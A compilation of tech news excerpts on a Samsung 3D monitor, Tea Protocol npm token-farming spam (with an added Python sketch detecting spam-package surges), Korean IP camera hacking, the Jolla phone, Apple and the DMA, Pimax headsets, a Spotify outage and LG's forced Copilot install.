The Samsung Odyssey 3D G9 – G90XF 27″ gaming monitor breaks new ground with glasses-free 3D. The technology incorporates eye tracking to create a striking depth effect in games and videos.

The 27″ (68cm) Samsung Odyssey 3D G9 – G90XF 4K UHD monitor features glasses-free 3D technology. Thanks to eye tracking and the View Mapping algorithm, the image adapts to the user’s position to create dynamic depth. It can also automatically convert 2D videos into 3D content thanks to AI processing. The screen uses an IPS panel with a refresh rate of 165Hz, a response time of 1 ms and 99% coverage of the sRGB space.

It is FreeSync Premium and G-Sync Compatible, guaranteeing smooth synchronization with the graphics card. Connectors include two HDMI 2.1 ports, one DisplayPort 1.4 and a USB port. The Reality Hub interface centralizes 3D functions and provides access to compatible games. It’s ideal for those who want to discover 3D without constraints, while retaining solid performance for gaming and multimedia uses.

[…]

Source: Samsung Odyssey: new 2025 gaming monitors – Son-Vidéo.com: blog

Tea – a way to secure FOSS by offering financial incentives – brews massive token farming campaigns (and dissolves them)

No good idea – like rewarding open source software developers and maintainers for their contributions – goes unabused by cybercriminals, and this was the case with the Tea Protocol and two token farming campaigns.

Both incidents gave the project’s founders a real-time view into how far – and fast – attackers will go to chase financial gain, and they helped shape “radical changes” that will roll out in the Tea network’s mainnet launch early next year, co-founder and CEO Tim Lewis told The Register.

The Tea Protocol was founded by Max Howell, who created open source package manager Homebrew, and Lewis, who established DEVxDAO, a non-profit that distributes grants to support decentralized computing projects, to reward open source developers and help secure software supply chains via financial incentives.

“When you think about the different package management ecosystems, they all have different gates in front of them, and none of them have been a financial gate,” Lewis said in an interview.

“There’s a human that sits in the front who has to be this gate, but it takes a toll on the human to go through all the data, and that’s only getting worse,” he said. “There’s the proliferation of the AI-induced pull requests, which are great, but that’s become like a DDoS attack.”

Last year, the duo rolled out the Tea Protocol testnet – essentially a test run for the incentives program that allows open source developers to earn cryptocurrency – specifically Tea tokens – for valuable code and fixes, while users can stake Tea to support specific projects and also earn rewards. A portion of the protocol rewards is shared with project maintainers and users who stake their tokens.

“Again, this was on a test network for fake internet points that could eventually potentially have some value,” Lewis said. “Our incentive for that period only lasted about three weeks.”

In April 2024, the Tea team shut down the incentive program’s rewards after about 15,000 spammy packages flooded the npm registry to farm Tea points. These contained little or zero useful functionality, and were instrumented with “tea.yaml” metadata that linked back to Tea accounts in an attempt to inflate developers’ reputation and earn payouts.

“We got to watch this happen in real time, and we recognized how fast, how far people had gone to create scripts that have a worm-like behavior,” Lewis said.

Then it got worse. In 2025, the earlier Tea farming campaign grew into the IndonesianFoods and Indonesian Tea campaigns that polluted more than 1 percent of npm with spam packages. And in November, Amazon uncovered more than 150,000 malicious npm packages, all linked to another Tea token farming campaign, that the cloud giant described as “one of the largest package flooding incidents in open source registry history.”

“I view this as a canary in the coal mine,” Lewis said.

In these token farming campaigns, the fraudsters flooded registries with spam, as opposed to cryptocurrency- and other secret-stealing laced code – and neither of the latter two is hypothetical. North Korea’s Lazarus Group and other sophisticated attackers have previously targeted npm for these illicit purposes.

“When you are a destructive organization like Lazarus Group, there’s incentive to use these same techniques to attack [supply chains],” Lewis said. “So we need to fix the core.”

How to reward secure code and penalize spam

To this end, Tea’s founders are working to fix the protocol’s design to ensure that the incentives program can’t be abused when the mainnet launches in early 2026.

This involves requiring packages and projects to pass ownership and provenance checks, and ensuring contributions aren’t just automated spam. The Tea team is also designing monitoring features that will check for Sybil attacks and flag surges in low-quality package creation and suspicious identities.

If malicious-looking patterns are detected, the developer won’t receive rewards and their registrations will be quarantined, pending further review.
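
A sketch of the kind of monitoring described above, as an added example that is not Tea's or PKGX's implementation: it flags a Tea account when low-content packages linked to it arrive in a burst, or when several registry identities point at the same account, and then lists that account's registrations for quarantine. The record fields, thresholds, account names and sample events are all assumptions constructed for illustration.

```python
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Optional

# Assumed thresholds; a real deployment would tune these against its own data.
MIN_CODE_BYTES = 512          # below this a package has little or no functionality
WINDOW = timedelta(hours=1)   # sliding window for surge detection
BURST = 3                     # low-content publishes per window that count as a surge
MAX_IDENTITIES = 2            # registry identities allowed per Tea account


@dataclass(frozen=True)
class Publish:
    when: datetime
    package: str
    publisher: str               # registry identity that published the package
    tea_account: Optional[str]   # account named in tea.yaml, None if no tea.yaml
    code_bytes: int
    dependents: int


def low_content(p):
    """A package that links to a Tea account but ships almost nothing."""
    return (p.tea_account is not None
            and p.code_bytes < MIN_CODE_BYTES
            and p.dependents == 0)


def review(events):
    """Return {tea_account: {"reasons": [...], "quarantined": [...]}}."""
    recent = defaultdict(deque)        # timestamps of low-content publishes
    identities = defaultdict(set)      # publishers behind low-content publishes
    registrations = defaultdict(list)  # every package linked to the account
    reasons = defaultdict(set)
    for p in sorted(events, key=lambda e: e.when):
        if p.tea_account is None:
            continue
        registrations[p.tea_account].append(p.package)
        if not low_content(p):
            continue
        window = recent[p.tea_account]
        window.append(p.when)
        while p.when - window[0] > WINDOW:
            window.popleft()           # drop publishes older than the window
        if len(window) >= BURST:
            reasons[p.tea_account].add("surge")
        identities[p.tea_account].add(p.publisher)
        if len(identities[p.tea_account]) > MAX_IDENTITIES:
            reasons[p.tea_account].add("sybil")
    # Only flagged accounts appear; all of their registrations are held for review.
    return {acct: {"reasons": sorted(r), "quarantined": sorted(registrations[acct])}
            for acct, r in reasons.items()}


# Constructed sample events (not real registry data).
T0 = datetime(2025, 1, 1, 12, 0)
SAMPLE = [
    Publish(T0 - timedelta(days=30), "date-utils", "alice", "tea-acct-legit", 40_000, 12),
    Publish(T0, "date-utils-cli", "alice", "tea-acct-legit", 9_000, 3),
    Publish(T0, "tiny-helper", "carol", "tea-acct-small", 300, 0),
    Publish(T0, "no-tea", "dave", None, 100, 0),
    *[Publish(T0 + timedelta(minutes=2 * i), f"pkg-{i:03d}", f"bot{i % 3}",
              "tea-acct-farm", 120, 0) for i in range(5)],
]

if __name__ == "__main__":
    for account, verdict in review(SAMPLE).items():
        print(account, verdict["reasons"], verdict["quarantined"])
```

A single small package, like `tiny-helper` in the sample, is not flagged on its own; only the burst and the shared account are.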

Additional key quality and security improvements will happen via integration with PKGX, which Howell wrote. It’s a package runner that creates a containerized environment for projects and manages developer tools across environments. PKGX verifies maintainers using cryptographic signatures and identity checks, and also evaluates their contributions to various projects for quality, along with security posture and dependencies.

This registry will integrate directly with Tea upon the protocol’s mainnet launch, and will auto-detect and penalize, if needed, spammy packages at the point of registration – not after – while rewarding maintainers for their legit contributions.

Automated SBOMs, bug bounties

In the future, Lewis says that this design will also allow enterprises to automate bug bounties, and SBOMs (software bills of materials) that provide an inventory of all the components found in a piece of software. This will make it easier for large companies to map out their dependencies, and then reward developers for fixing any critical security issues they find.

[…]

“Some CISO, somewhere, every day is looking at his tens of thousands of packages that he approved for use, and now he’s responsible for whether or not these things are secure,” Lewis said. “He can’t have all the people that work within his department spend all of their time trying to get some guy in Nebraska to review a pull request and get the critical bug for his architecture solved en masse. We’re hoping this creates a tool that allows that value distribution without impermanent loss en masse.”

Lewis’ goal, he says, is to see upwards of “millions of dollars a day, retrieved for issue completion.”

Project developers and maintainers write the fixes, and chief security officers can confirm to their boards of directors that their dependencies and critical code are secure. “Plus, the mean time for resolution for these issues comes down – and they are not funding groups like North Korea’s Lazarus,” he added.

In other words: Tea’s goal reaches fruition. Open source project maintainers get paid for their valuable work, code becomes more secure, financially motivated crews can’t game the system, and the world becomes a better place. ®

Source: CEO spills the Tea about massive token farming campaigns • The Register

Mass hacking of IP cameras leave Koreans feeling vulnerable in homes, businesses

[…]hackers recently breached approximately 120,000 IP cameras across Korea — often found inside private homes like Kim’s — has left her and many others seething, prompting the government to take action.

As shocking as the scale of the intrusions was the alleged motive behind them. Videos captured by the hacked cameras were allegedly sold to an overseas pornography website, exposing some of the most intimate moments of unsuspecting victims to anonymous viewers abroad.

Only 1,193 videos from the hacked cameras have been uncovered so far on overseas websites, raising concerns that many more remain undiscovered.

In response, an interagency task force comprising officials from the Ministry of Science and ICT, the Personal Information Protection Commission and the National Police Agency announced on Dec. 7 that it would pursue a multilayered reform package. The measures aim to shift responsibility beyond individuals and camera manufacturers to include installation companies and telecommunications providers.

Yet as policymakers scramble to overhaul regulations and reinforce technical safeguards, interviews with everyday users of IP cameras reveal a gap between how these devices are used and understood and the level of risk they actually pose.

[…]

Many hacked cameras were protected by simple or widely known passwords that were rarely changed. A government survey found that only 59 percent of installation companies consistently carried out mandatory security measures, such as changing default password settings.

[…]

What sets the current case apart — and prompted the government’s unusually forceful response — is the nature of the harm involved.

Police believe one suspect hacked 63,000 IP cameras, producing 545 videos that he sold to an overseas website for 35 million won ($24,000) in cryptocurrency. Another suspect allegedly hacked 70,000 devices, creating 648 videos that he later sold to the same website for 18 million won.

The two individuals, whom police say are not accomplices, sourced most of their footage from IP cameras installed in ordinary homes, gynecology offices, breastfeeding rooms, massage parlors, Pilates studios and waxing salons. They often accessed the same compromised devices repeatedly. The videos accounted for 62 percent of all content on the website, which includes a separate “Korean” category.

Two additional suspects are accused of hacking 15,000 cameras and 136 devices, respectively, to collect footage for private possession.

Unlike leaked phone numbers or delivery addresses, compromised IP camera footage can expose faces, bodies, children and private spaces. Prof. Kim emphasized that hacked cameras can reveal “an individual’s movements, daily life and relationships,” making the potential for privacy violations “extremely high.”

[…]

Source: Mass hacking of IP cameras leave Koreans feeling vulnerable in homes, businesses

New Jolla Phone Pre-orders hit target quickly. Shows people are fed up with iOS-Android monopoly

After successful crowdfunding, the latest release of the original handheld Linux distro will power a new handset coming in mid-2026.

The initial crowdfunding drive for the new Jolla Phone seems to have gone well: at the time of writing, the new device has comfortably passed double the number of orders needed to go into production. Finnish vendor Jolla set a goal of 2,000 €99 pre-order deposits by January 4th, but passed the goal in less than two weeks. The first batch of 2,700 units were £499. Batch 2 will ship two to four weeks later, and cost €549, but that’s now sold out too. Currently, well over 5,000 orders have been placed. With 20 days to go, the pre-order page says:

We take a maximum of 10,000 pre-orders until January 31st, 2026. Reserve your spot and lock your special total price of 579€.

The new Jolla Phone, resplendent in The Orange – or Snow White and Kaamos Black

The down payment will be deducted from the total price. Jolla is now taking orders for 5,200 units in batch 3, which will cost €579 and ship three to six weeks later. After the first few production runs, totalling 10,000 units, the price of the handset will go up to €599 to €699.

The phone specs were set by a survey the company ran, with a first stage in August followed by a November update. To our eyes it looks decent if not outstanding: 5G connectivity, a 6.36 inch AMOLED screen, an indicator LED, 12 GB of RAM plus 256 GB of storage expandable via microSDXC. Some of the details are welcome: a user-replaceable 5,500 mAh battery, plus a software-based privacy switch which can disable the microphone, or Bluetooth, or Android apps, or other programmable options. For this vulture, a sad absence is a headphone socket.

An added incentive, if the device sells 10,000 units, is the return of smart back covers called The Other Half, which even included a keyboard.

[…]

Sailfish is distinct from any other mobile OS today. Its origins at Nokia predate the January 2007 launch of the iPhone, by whose prospects The Reg was not enthralled. That, of course, also means it was out long before Android, which as Daring Fireball described in 2010 was originally designed to rival Blackberry. (The Internet Archive still has some of Engadget’s screenshots.) After Android was remodeled to take on Apple, both OSes look a lot like each other: the home screen is a grid of app icons, and both lean heavily on tapping on-screen buttons. (Before that, of course, they relied on physical buttons.)

[…]

Sailfish 5 feels very different, with little visible influence from anything else. You flip between its two home screens by swiping left and right. One holds a list of messages and notifications, and the other is a full-screen app switcher, with tiles for each open app. Dragging up from the bottom reveals the app launcher. Uniquely, it distinguishes between long and short drags down from the top of the screen: a long fast swipe down opens a settings panel, but in native Sailfish apps, a short slow drag opens a full-screen-width menu; you scroll up and down until the desired option is highlighted, then select it by lifting your thumb. It shows whether options are turned on or off with a large, bright white dot, or a smaller dimmer dot. A different white dot at top left is also the Back button, where one makes sense.

Like the overloaded white-dot symbol, some aspects of the OS are a little confusing. In addition to the official Jolla Store, there are two different tools for managing third-party native apps: StoreMan manages software from the collection on OpenRepos, and Chum GUI manages RPM packages from Chum. Then there’s the built-in AppSupport compatibility layer, which lets you run Android apps. We installed both F-Droid and the Aurora store, and had no problems installing any typical tools such as Signal, Whatsapp, or YouTube Kids.

There are built-in apps for all the things you’d expect a smartphone to do, and these connect to the usual suspects such as Google’s email, calendar, and contacts. There’s a browser based on Mozilla tech, as well, which works fine – as did Android browsers such as Vivaldi. Like its very distant relative Symbian, though, this is a local-first sort of device which can sync, rather than a pocket cloud client.

Maps are a particular weak point: we tried Google Maps and Nokia spin-off Here, which both literally drew a blank. The OpenStreetMap-based Mapy.com ran and could be searched, but couldn’t detect our location. There aren’t many cloud-storage clients, either. The stock keyboard doesn’t support swipe-style text entry, which we found frustrating.

Overall, Sailfish is arguably the most complete independent mobile OS. It’s totally separate from anything from Google, or Apple, or desktop Linux, and the app catalog is impressive. We did regularly get lost in its slightly idiosyncratic UI, but it was always possible to get out again. If you want a total break from the mainstream mobile duopoly, this is a viable alternative. Although you might need a standalone sat-nav too.

[…]

Source: New Jolla, Sailfish 5, offer break from iOS-Android monopoly • The Register

Devs say Apple still flouting EU’s DMA six months on, but cutting fees in US

Six months after EU regulators found Apple’s App Store rules

The Coalition for App Fairness, a nonprofit organization of app developers and consumer groups, has accused Apple of persistent non-compliance with the DMA, warning that the company’s revised App Store terms continue to impose fees which the legislation prohibits.

In an open letter addressed to European Commission President Ursula von der Leyen and senior commissioners, the coalition argues that Apple has failed to deliver “any meaningful changes or proposals” despite an April 2025 non-compliance decision that found its App Store policies illegal and harmful to both developers and consumers.

At the heart of the complaint is money. The DMA requires so-called gatekeepers to allow developers to offer and conduct transactions outside their app stores without charge. Apple, the coalition claims, is seeking to charge commissions of up to 20 percent on those very transactions.

“This is a blatant disregard for the law with the potential to vanquish years of meaningful work by the Commission,” the letter states, accusing Apple of preserving the economics of its App Store while nominally claiming compliance.

Apple has said it will roll out new App Store terms in January 2026, but developers say the company has provided no clarity on what those changes will involve or whether they will actually comply with the DMA.

“We have seen this playbook before in Europe and beyond,” the signatories warn, adding that they suspect any new terms will continue to impose fees that would violate the law.

The letter argues that this uncertainty is already doing damage. Six months after Apple’s last App Store terms update, developers still do not know which rules will govern their businesses or what their costs will look like in the near term.

Apple’s “lack of transparency in tandem with its rushed timelines,” the coalition says, is freezing investment and innovation, effectively allowing the company to “exploit its gatekeeper position by holding the entire industry hostage.”

The group also points to a growing transatlantic contrast that makes Europe look like the tougher regulator with the weaker results. While Apple continues to fight DMA enforcement in the EU, US courts have moved to curb its ability to extract fees from external transactions. Following litigation brought by Epic Games, developers in the US can now communicate freely with customers about pricing and offer payment options outside Apple’s ecosystem without paying commission.

That raises what the coalition calls a “simple and urgent question.” Why should European developers and consumers get a worse deal than their US counterparts, especially when the EU was first to pass a landmark law aimed at fixing digital markets?

[…]

Source: Devs say Apple still flouting EU’s DMA six months on • The Register

Pimax debuts Crystal Super Micro-OLED, Dream Air, & Dream Air SE – light 8k VR

Pimax, a manufacturer of virtual reality (VR) hardware, debuted its next generation of PC virtual reality (PCVR) headsets to the public at CES 2026. The company demonstrated the final production model of the ‘Crystal Super Micro-OLED,’ alongside its new ‘Dream Air’ and ‘Dream Air SE’ devices.

Both the Crystal Super Micro-OLED and the Dream Air utilize the same optical stack, featuring 4K Sony micro-OLED panels per eye and Pimax’s proprietary “ConcaveView” lens technology. The company noted that the Dream Air SE is positioned as a more affordable version of the Dream Air, though it also utilizes the ConcaveView lenses.

Through close collaboration with hardware partners, Pimax stated that it aims to demonstrate how high-end PCVR can reach its full potential as part of a complete ecosystem. Attendees at CES were able to experience motion feedback and control systems across racing, flight, and active VR setups.

Auganix Managing Editor Sam Sprigg tries a racing sim demo with Pimax’s new Dream Air headset at CES 2026.

Source: Pimax debuts Crystal Super Micro-OLED, Dream Air, & Dream Air SE

Spotify was down this morning for thousands of users

My boyfriend texted me those dreaded four words: “Is your Spotify down?” Sure enough his, mine and thousands of other users’ Spotify accounts appear to be down and out at the moment, with Downdetector recording over 10,000 reports from users.

Spotify is apparently working on the problem. The account, Spotify Status, shared an update on X at 9:45 AM on Monday, “We’re aware of some issues right now and are checking them out!” About an hour later, the company shared an update saying that the outage was resolved as of 10:34 AM ET.

Source: Spotify was down this morning for thousands of users: Updates on the widespread outages

After Samsung forces Gemini, LG TV users get unremovable Microsoft Copilot through forced update

LG smart TV owners are reporting that a recent webOS software update has added Microsoft Copilot to their TVs, with no apparent way to remove it. Reports first surfaced over the weekend on Reddit, where a post showing a Copilot tile pinned to an LG TV home screen climbed to more than 35,000 upvotes on r/mildlyinfuriating, accompanied by hundreds of comments from users describing the same behavior.

According to affected users, Copilot appears automatically after installing the latest webOS update on certain LG TV models. The feature shows up on the home screen alongside streaming apps, but unlike Netflix or YouTube, it cannot be uninstalled.

LG has previously confirmed plans to integrate Microsoft Copilot into webOS as part of its broader “AI TV” strategy. At CES 2025, the company described Copilot as an extension of its AI Search experience, designed to answer questions and provide recommendations using Microsoft’s AI services. In practice, the iteration of Copilot currently seen on LG TVs appears to function as a shortcut to a web-based Copilot interface rather than a fully native application like the one described by LG.

The issue, for many, isn’t necessarily what Copilot does, but that it has been forced onto consumers with no option to remove it. LG’s own support documentation notes that certain preinstalled or system apps cannot be deleted, only hidden. Users who encounter Copilot after the update report that this limitation applies, leaving them with no way to fully remove the feature once it has been added. It’s a similar story on rival models; for instance, some Samsung TVs include Gemini.

The overwhelmingly negative reaction from users indicates a growing frustration with AI features being imposed on consumers in every way possible. Smart TVs have naturally become platforms for advertising, data collection, and now AI services, with updates adding new functionality that owners did not explicitly request and, in most cases, do not want. While LG allows users to disable some AI-related options, such as voice recognition and personalization features, those settings do not remove the Copilot app itself.

Ultimately, those wanting to minimize Copilot’s presence on their TVs are limited to keeping it disconnected from the Internet. That’s about the most that can be done at the moment, unless LG backtracks and either allows users to disable or completely uninstall the app in response to backlash, which seems unlikely.

Source: LG TV users baffled by unremovable Microsoft Copilot installation — surprise forced update shows app pinned to the home screen | Tom’s Hardware